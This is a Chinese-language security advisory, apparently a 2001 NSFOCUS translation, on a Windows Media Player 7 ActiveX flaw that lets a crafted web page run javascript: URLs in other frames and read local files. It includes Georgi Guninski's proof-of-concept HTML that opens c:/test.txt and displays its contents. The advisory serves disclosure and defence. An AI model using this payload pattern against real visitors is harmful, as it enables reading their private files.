首页 -> 安全研究

安全研究

安全漏洞
Windows媒体播放器执行JavaScript URL的漏洞

发布日期:2001-01-04
更新日期:2001-01-04

受影响系统:

Microsoft Windows Media Player 7
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 2000
描述:

Windows媒体播放器是一个用于察看数字音频和视频内容的应用程序。它可以作为ActiveX
控件嵌入到Web页面中。

它存在一个漏洞,即有可能从嵌入在HTML中的Windows媒体播放器ActiveX控件中执行一个
JavaScript URL。该javascript可以在已经打开的任意frame中执行,这些frame在
ActiveX控件中指定。攻击者从而能够控制这些frame的DOM(Document Object Model),
绕过安全限制。这种攻击可以通过一个特殊构造的Web页面来完成,受害者访问该页面时就
会受到攻。

攻击者利用这个漏洞可以读取来访者的文件系统中的文件,据报道还可以在受害者的机器
上执行任意程序。

<*来源:Georgi Guninski (guninski@guninski.com) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Georgi Guninski 提供了如下测试代码:
--------wmp7ie.html------------------------------------------------
<object id="o1" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6">
<PARAM NAME="defaultFrame" value="georgi">
</object>
<SCRIPT>
alert("This page reads C:\\test.txt");
window.open("file://c:/test.txt","georgi");
function f()
{
document.o1.object.launchURL("javascript:alert(document.body.innerText)");
}
setTimeout("f()",1000);
</SCRIPT>
---------------------------------------------------------------------

建议:

临时解决办法:

禁止执行Active 脚本

厂商补丁:

    暂无。


浏览次数:4580
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障